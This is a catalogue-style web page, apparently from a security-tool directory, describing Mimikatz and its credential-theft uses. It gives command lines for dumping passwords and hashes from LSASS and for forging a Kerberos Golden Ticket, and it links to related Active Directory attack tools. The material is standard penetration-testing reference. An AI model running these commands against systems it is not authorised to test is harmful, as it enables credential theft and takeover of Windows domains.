provocativo_
back to the arsenal
// arsenal·Post-ExploitAdvancedFOSS

Mimikatz

Benjamin Delpy's Windows credential-theft Swiss Army knife.

Post-Exploit

$ mimikatz --help

Mimikatz

// what it is

Description

Dumps NTLM hashes, Kerberos tickets, plaintext passwords from LSASS; forges Golden and Silver tickets; performs Pass-the-Hash and Pass-the-Ticket. Released in 2007 'as an educational tool' — single-handedly invented modern Windows credential tradecraft.

// use cases

What people use it for

  • Dump cached credentials from LSASS
  • Forge Golden Tickets
  • Extract Kerberos tickets for Pass-the-Ticket

// commands

The commands you'll type

Enable debug + dump

$ privilege::debug
sekurlsa::logonpasswords

Golden ticket

$ kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-... /krbtgt:<hash> /ptt

// facts

category
Post-Exploit
platforms
WIN
license
FOSS
difficulty
Advanced

// links

// related in Post-Exploit

Post-ExploitAdvanced

Impacket

SecureAuth (now Fortra) Python toolkit for low-level Windows network protocols.

FOSS
LIN·WIN·MAC
open entry →
Post-ExploitAdvanced

BloodHound

Active Directory attack-path visualizer — graphs the shortest path to Domain Admin.

FOSS
LIN·WIN·MAC
open entry →
Post-ExploitAdvanced

CrackMapExec/CME/

Swiss-army knife for AD post-exploitation — sprays credentials over SMB/WinRM/MSSQL/LDAP.

FOSS
LIN·WIN·MAC
open entry →